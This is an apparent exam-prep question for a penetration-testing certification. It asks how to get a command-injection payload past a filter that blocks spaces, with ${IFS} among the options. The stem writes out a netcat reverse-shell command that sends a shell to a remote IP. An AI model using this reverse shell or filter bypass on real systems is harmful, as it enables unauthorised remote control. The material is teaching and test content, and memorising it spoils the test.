List of questions
Related questions
Question 72 - PT0-003 discussion
A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability. The tester uses the following command:
nc -e /bin/sh 10.10.10.16 4444
Which of the following would most likely bypass the filtered space character?
A.
${IFS}
B.
%0a
C.
+ *
D.
%20
Your answer:
0 comments
Sorted by
Leave a comment first